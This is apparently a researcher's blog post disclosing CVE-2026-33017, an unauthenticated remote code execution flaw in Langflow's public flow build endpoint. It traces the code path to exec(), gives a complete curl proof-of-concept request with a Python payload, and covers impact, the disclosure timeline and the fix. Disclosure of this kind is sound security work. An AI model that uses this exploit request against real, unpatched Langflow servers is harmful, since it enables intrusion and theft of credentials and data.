aviral srivastava

Posted on Mar 19

CVE-2026-33017: How I Found an Unauthenticated RCE in Langflow by Reading the Code They Already Fixed

#python #security #ai #cybersecurity

In early 2025, CISA added CVE-2025-3248 to their Known Exploited Vulnerabilities catalog. It was an unauthenticated remote code execution bug in Langflow, the popular open-source AI workflow builder with over 146,000 GitHub stars. The vulnerability was simple: the /api/v1/validate/code endpoint accepted arbitrary Python code and passed it to exec() without requiring authentication. Botnets were actively exploiting it. The fix was straightforward too. The Langflow team added an authentication check to the endpoint and moved on.

I found the same class of vulnerability on a different endpoint. Same codebase. Same exec() call at the end of the chain. Same zero sandboxing. But this time, the fix isn't as simple as slapping an auth decorator on it, because the vulnerable endpoint is supposed to be unauthenticated. That's what makes this one interesting.

The Target

Langflow lets you build AI workflows visually by dragging and dropping components into a canvas. You wire them together, and Langflow executes the resulting pipeline. It's the kind of tool that teams deploy to let non-engineers build chatbots, RAG pipelines, and agent workflows without writing code.

A key feature is public flows. You build a workflow, mark it as public, and share a link. Anyone with the link can interact with it. No login required. This is how most Langflow-powered chatbots work in production: the end user visits a URL, chats with the bot, and the flow runs on the server behind the scenes.

For public flows to work, the endpoint that builds and executes them can't require authentication. That's by design. The problem is what else that endpoint accepts.

Finding the Bug

I was reading src/backend/base/langflow/api/v1/chat.py and comparing two endpoints side by side. At line 138, there's the authenticated build endpoint:

@router.post("/build/{flow_id}/flow")
async def build_flow(
    *,
    flow_id: uuid.UUID,
    data: Annotated[FlowDataRequest | None, Body(embed=True)] = None,
    current_user: CurrentActiveUser,  # <-- AUTH REQUIRED
    ...
):

And at line 580, there's the public flow build endpoint:

@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
    *,
    flow_id: uuid.UUID,
    data: Annotated[FlowDataRequest | None, Body(embed=True)] = None,
    request: Request,
    # No current_user dependency. No auth at all.
):

Both endpoints accept an optional data parameter of type FlowDataRequest. Both pass it downstream to the same graph building pipeline. The authenticated endpoint requires a valid user session. The public one does not.

Here's the thing about that data parameter. When it's None, the endpoint loads the flow definition from the database. The flow that was saved by an authenticated user through the Langflow UI. Safe, expected behavior.

When data is provided, the endpoint uses the caller's flow definition instead. This is meant for the authenticated endpoint, where a logged-in user might want to test a modified version of their flow without saving it first. It's a convenience feature for the visual editor.

But the public endpoint accepts it too. And it doesn't require authentication. So an unauthenticated attacker can send a completely fabricated flow definition containing arbitrary Python code, and the server will build and execute it.

The Execution Chain

A Langflow flow definition is JSON. It contains nodes, and each node has a template with a code field. This code defines the component's behavior. Under normal operation, this code is written by authenticated users through the visual editor.

When the server builds a flow, it walks through each node and instantiates the component. Here's the chain:

The attacker's data arrives at start_flow_build() and flows into generate_flow_events(). That calls create_graph(), which calls build_graph_from_data() with the raw payload. Graph.from_payload() parses the attacker's nodes. The graph builder iterates through them, calling vertex.instantiate_component() for each one, which calls instantiate_class(). That function extracts the code field from the node's template and passes it to eval_custom_component_code(), which calls create_class(), which calls prepare_global_scope().

And in prepare_global_scope(), at line 397 of validate.py:

exec(compiled_code, exec_globals)

No sandbox. No restrictions on imports. Full access to the Python runtime. The exec_globals dictionary is initialized from globals().copy(), meaning the executed code has access to everything the server process has access to.

There's a subtle detail that makes this worse. prepare_global_scope doesn't just execute class definitions and function definitions. It also executes ast.Assign nodes. That means a line like:

_x = os.system("id")

...is an assignment, and it gets executed during the graph building phase. The attacker's code runs before the flow even "starts." There's no need for the flow to complete successfully. The damage is done during component instantiation.

The Exploit

The exploit is a single HTTP POST request. No authentication headers. No API keys. Just a client_id cookie set to any arbitrary string and a JSON body containing a malicious flow definition:

curl -X POST "http://target:7860/api/v1/build_public_tmp/${FLOW_ID}/flow" \
  -H "Content-Type: application/json" \
  -b "client_id=attacker" \
  -d '{
    "data": {
      "nodes": [{
        "id": "Exploit-001",
        "type": "genericNode",
        "position": {"x":0,"y":0},
        "data": {
          "id": "Exploit-001",
          "type": "ExploitComp",
          "node": {
            "template": {
              "code": {
                "type": "code",
                "value": "import os\n_x = os.popen(\"id\").read()\nopen(\"/tmp/pwned\",\"w\").write(_x)\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n    display_name=\"X\"\n    outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n    def r(self)->Data:\n        return Data(data={})",
                "name": "code"
              },
              "_type": "Component"
            },
            "base_classes": ["Data"],
            "display_name": "ExploitComp"
          }
        }
      }],
      "edges": []
    }
  }'

Two seconds later, /tmp/pwned contains the output of id. Full RCE. No credentials.

The only prerequisite is knowing the UUID of a public flow on the target instance. In practice, these are discoverable through shared chatbot links. And when AUTO_LOGIN=true (which is the default), even that prerequisite disappears, because the attacker can call /api/v1/auto_login to get a superuser token and create a public flow themselves.

I tested this against Langflow 1.7.3, the latest stable release at the time. Six runs, six confirmed executions, 100% reproducibility.

Why This Is Not CVE-2025-3248

When I wrote the advisory, I knew the first question would be: "Isn't this the same bug that was already fixed?" It's not, but the distinction matters.

CVE-2025-3248 was in /api/v1/validate/code. That endpoint existed solely to validate Python code and it had no authentication. The fix was simple: add Depends(get_current_active_user) to the endpoint. Done.

CVE-2026-33017 is in /api/v1/build_public_tmp/{flow_id}/flow. This endpoint is designed to be unauthenticated because it serves public flows. You can't just add an auth requirement without breaking the entire public flows feature. The real fix is removing the data parameter from the public endpoint entirely, so public flows can only execute their stored (server-side) flow data and never accept attacker-supplied definitions.

Same root cause pattern. Different endpoint. Different fix. And arguably a harder problem to solve, because the previous fix (adding auth) doesn't apply here.

The Pattern: Incomplete Fixes and Parallel Code Paths

This is a pattern I keep seeing across AI infrastructure projects. A vulnerability gets reported and fixed on one endpoint, but the same dangerous behavior exists on a parallel endpoint that nobody checked.

In Langflow's case, CVE-2025-3248 fixed /api/v1/validate/code by adding authentication. But nobody audited the other endpoints that also feed user input into exec(). The build_public_tmp endpoint had the same fundamental problem: untrusted code reaching exec() without a sandbox. The only difference was the path it took to get there.

This is why, when I audit a codebase, I start by looking at what was already fixed. The patches tell you what the developers consider a vulnerability. Then you search for the same pattern everywhere they didn't look. The authenticated build endpoint at line 138 and the public build endpoint at line 580 accept the exact same data parameter and feed it into the exact same pipeline. One requires auth. The other doesn't. That gap is the vulnerability.

Impact

This is about as bad as it gets for a web application. An unauthenticated attacker sends a single HTTP request and gets arbitrary code execution with the full privileges of the server process. From there:

Every environment variable is readable. That includes API keys for OpenAI, Anthropic, and whatever other LLM providers are configured. It includes database credentials, cloud tokens, and internal service URLs.

Every file on the server is readable and writable. The attacker can exfiltrate the entire database, modify flow definitions to inject backdoors, or wipe everything.

Reverse shells are trivial. One line of Python in the exploit payload opens a persistent connection back to the attacker. From there, lateral movement into the rest of the network.

For context: the previous Langflow RCE (CVE-2025-3248) made it onto CISA's Known Exploited Vulnerabilities list and was actively used by botnets. This vulnerability is the same severity class on the same codebase.

The Disclosure

I reported this through Langflow's GitHub Security Advisory on February 25, 2026. The initial response took about two weeks and a couple of follow-up pings from my end. Once the team engaged, things moved quickly. They merged a fix in PR #12160, and the advisory was published on March 16, 2026.

There was a small hiccup in the process. After the fix was merged, the advisory was initially closed without being published. I explained why publication matters: no CVE assignment means no Dependabot alerts, no way for downstream projects to track the issue, and no public record of the fix. The Langflow team was receptive, reopened the advisory, and published it. The maintainer handling the advisory was upfront about the security process being new to them, and I appreciated that. Not every vendor is that responsive.

GitHub assigned CVE-2026-33017 on March 17, 2026, with a CVSS v4 score of 9.3 (Critical).

Timeline

Date	Event
February 25, 2026	Reported via GitHub Security Advisory
March 10, 2026	Langflow team acknowledges the report
March 10, 2026	Fix merged in PR #12160
March 16, 2026	Advisory published (GHSA-vwmf-pq79-vjvx)
March 17, 2026	CVE-2026-33017 assigned

Recommendations

If you're running Langflow, update immediately. The fix is in PR #12160. Any version up to and including 1.8.1 is affected.

If you're building AI infrastructure with user-facing endpoints, audit every code path that touches exec() or eval(). It's not enough to add authentication to one endpoint. You need to trace every route that untrusted input can take to reach code execution and either eliminate it or sandbox it properly.

And if you've fixed a vulnerability in your codebase before, go back and check whether the same pattern exists somewhere else. The first fix is rarely the last one needed.

References

Advisory: GHSA-vwmf-pq79-vjvx
CVE: CVE-2026-33017
Fix: langflow-ai/langflow#12160
Related: CVE-2025-3248 (previous Langflow RCE, CISA KEV)

DEV Community